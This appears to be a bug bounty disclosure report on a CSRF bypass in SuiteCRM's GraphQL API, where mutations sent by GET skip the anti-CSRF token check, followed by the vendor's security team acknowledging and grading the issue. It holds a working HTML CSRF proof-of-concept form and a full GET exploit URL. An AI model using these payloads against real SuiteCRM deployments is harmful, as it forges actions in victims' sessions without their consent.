CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core
Reported on
Jun 3rd 2023
Description
Mutations are saveRecord or createProcess queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with a X-Xsrf-Token header. the bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an attacker cound leverage this to bypass the existing CSRF protection.
Proof of Concept :
- Save it with html extension and click on submit request and the user account is created .
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://suite8demo.suiteondemand.com/api/graphql">
<input type="hidden" name="query" value="mutation{saveRecord(input:{module:"accounts",attributes:{assigned_user_name:{user_name:"kjn"},name:"testing",phone_office:"",phone_alternate:"",website:"https://14.rs",phone_fax:"",email_addresses:[],billing_address:"",billing_address_street:"",billing_address_city:"",billing_address_state:"",billing_address_postalcode:"",billing_address_country:"",shipping_address:"",shipping_address_street:"",shipping_address_city:"",shipping_address_state:"",shipping_address_postalcode:"",shipping_address_country:"",description:"",account_type:"",industry:"",annual_revenue:"",employees:"",parent_name:"",campaign_name:"",date_entered:"",date_modified:""}}){clientMutationId,record{attributes,id,_id,module,acls,type,favorite}}}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
#URL used in GET request
https://suite8demo.suiteondemand.com/api/graphql?query=mutation{saveRecord(input:{module:%22accounts%22,attributes:{assigned_user_name:{user_name:%22will%22},name:%22test%22,phone_office:%22%22,phone_alternate:%22%22,website:%22https://google.com%22,phone_fax:%22%22,email_addresses:[],billing_address:%22%22,billing_address_street:%22%22,billing_address_city:%22%22,billing_address_state:%22%22,billing_address_postalcode:%22%22,billing_address_country:%22%22,shipping_address:%22%22,shipping_address_street:%22%22,shipping_address_city:%22%22,shipping_address_state:%22%22,shipping_address_postalcode:%22%22,shipping_address_country:%22%22,description:%22%22,account_type:%22%22,industry:%22%22,annual_revenue:%22%22,employees:%22%22,parent_name:%22%22,campaign_name:%22%22,date_entered:%22%22,date_modified:%22%22}}){clientMutationId,record{attributes,id,_id,module,acls,type,favorite}}}
#Poc:
https://drive.google.com/file/d/1yBXsdp98SV8Ji7YtGf378EbdKAXkGfG8/view?usp=sharing
Impact
The attacker could control bypass the existing CSRF check on the graphql endpoint.
Hi srivallikusumba Thank you for your Security Report. We have raised the issue from this report with our internal security team to be confirmed. Below is a reference of the issue raised and ID allocated: - SCRMBT-#237 - CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core We will review the issue and confirm it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or a more appropriate place. Thank you for your continued contribution to the SuiteCRM project. Kind regards,
SuiteCRM Security Team
Hi @srivallikusumba,
The Security Team have now assessed the following issue:
SCRMBT-#237 - CSRF on /api/graphql query executing the mutations through GET requests in salesagility/suitecrm-core
This issue has been given a severity grading of 'Important'. Due to the severity of this issue we are working to release a fix for it very soon.
Once the fix is released, we aim to include your name in the release notes - giving credit for finding and reporting this issue. Please let us know if you would prefer not be included or have a specific request on how you would like to be referenced within the release notes.
Thank you for your assistance and contribution to the SuiteCRM product!
Kind regards, SuiteCRM Security Team
Hi @srivallikusumba,
Yes, a CVE will be automatically assigned by huntr.dev when the issue is marked as fixed.
Kind regards, SuiteCRM Security Team
